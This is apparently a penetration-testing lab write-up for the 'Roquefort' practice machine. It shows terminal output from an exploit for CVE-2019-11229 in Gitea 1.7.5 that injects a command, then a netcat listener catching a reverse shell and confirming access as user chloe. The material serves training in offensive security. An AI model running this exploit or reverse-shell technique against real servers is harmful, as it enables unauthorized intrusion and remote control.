CVE-2019-11229
The target Gitea instance is vulnerable to CVE-2019-11229 due to its outdated version; 1.7.5
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort]
└─$ python3 CVE-2019-11229.py
Logging in
Logged in successfully
Retrieving user ID
Retrieved user ID: 1
Initialized empty Git repository in /tmp/tmpl47szlzz/.git/
[master (root-commit) eebfabc] x
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 x
Cloning into bare repository '/tmp/tmpl47szlzz.git'...
done.
Created temporary git server to host /tmp/tmpl47szlzz.git
Creating repository
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/HEAD HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/objects/ee/bfabc5891589166f91ae3394504b6ee49a82cd HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/objects/58/05b676e247eb9a8046ad0c4d249cd2fb2513df HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] code 404, message File not found
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.wiki.git/info/refs?service=git-upload-pack HTTP/1.1" 404 -
192.168.206.67 - - [04/Apr/2025 15:20:46] code 404, message File not found
192.168.206.67 - - [04/Apr/2025 15:20:46] "GET /tmpl47szlzz.git/wiki/info/refs?service=git-upload-pack HTTP/1.1" 404 -
Repo "tnkcwlba" created
Injecting command into repo
Command injected
Triggering command
Command triggeredExecuting the modified exploit script
/Practice/Roquefort/3-Exploitation/attachments/{CB11DA56-EF3D-4265-837F-D8D6994A6E98}.png)
/Practice/Roquefort/3-Exploitation/attachments/{BCBC6CBB-4684-4DD2-9FCE-FC445D6FADF0}.png)
The exploit script performed the synchronization and command was executed to fetch the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort]
└─$ nnc 2222
listening on [any] 2222 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.67] 35626
whoami
chloe
hostname
roquefort
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:15:1f brd ff:ff:ff:ff:ff:ff
inet 192.168.206.67/24 brd 192.168.206.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the chloe user via exploiting CVE-2019-11229